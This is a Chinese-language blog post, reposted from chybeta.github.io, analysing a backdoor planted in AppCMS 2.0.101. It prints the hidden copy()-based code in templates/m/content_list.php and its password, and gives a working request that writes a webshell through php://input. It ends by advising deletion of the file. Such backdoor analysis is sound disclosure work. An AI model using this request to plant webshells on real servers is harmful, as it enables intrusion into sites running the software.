AppCMS 2.0.101 后门分析

源码

下载地址:http://www.appcms.cc/html/gengxin.html

image

官方的更新时间是 2015-8-1

分析

用beyond compare比较与前一个版本的区别

image

可以发现,在 templates/m/ 文件夹下出现了一个 content_list.php 文件,修改时间为 2017年5月25日。

image

经过解密,9c224bc6b59179729b15e1dddcbb5c82为字符串kejishidai的md5值。

由代码知,这里存在一个copy函数构成的后门。

在第12行,实际执行的即为:

1
copy(trim($_GET[url]),$_GET[cms]);

将参数url设置为php://input,参数cms设置为shell的文件名,然后POST传入webshell。如下:

1
2
3
http://127.0.0.1:2500/appcms/appcms_2.0.101/templates/m/content_list.php?session=kejishidai&url=php://input&cms=temp.php
POST:
<?php phpinfo();?>

image

接着访问:

http://127.0.0.1:2500/appcms/appcms_2.0.101/templates/m/temp.php

image

getshell。

建议

删除 templates/m/ 文件夹下的content_list.php。

转载自:https://chybeta.github.io

-------------本文结束感谢您的阅读-------------